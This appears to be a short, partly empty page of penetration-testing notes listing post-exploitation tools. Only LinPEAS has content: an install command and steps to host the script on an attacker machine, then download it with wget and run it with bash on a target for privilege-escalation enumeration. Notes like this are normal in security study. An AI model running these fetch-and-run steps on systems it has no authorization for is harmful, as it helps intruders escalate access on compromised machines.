Tools and Utilities

Here we can find some tools and utilities commonly used for practices related to post-exploitation:

LinPEAS

Commands

  • Installation

sudo apt install peass

  • Usage

#Host machine
linpeas
python3 -m http.server $port #Create server to send file

#Target machine
cd /tmp
wget http://$hostIP:$port/linpeas.sh
bash linpeas.sh

WinPEAS

Commands

  • Usage

GTFOBins

LOLBAS

linuxprivchecker

Last updated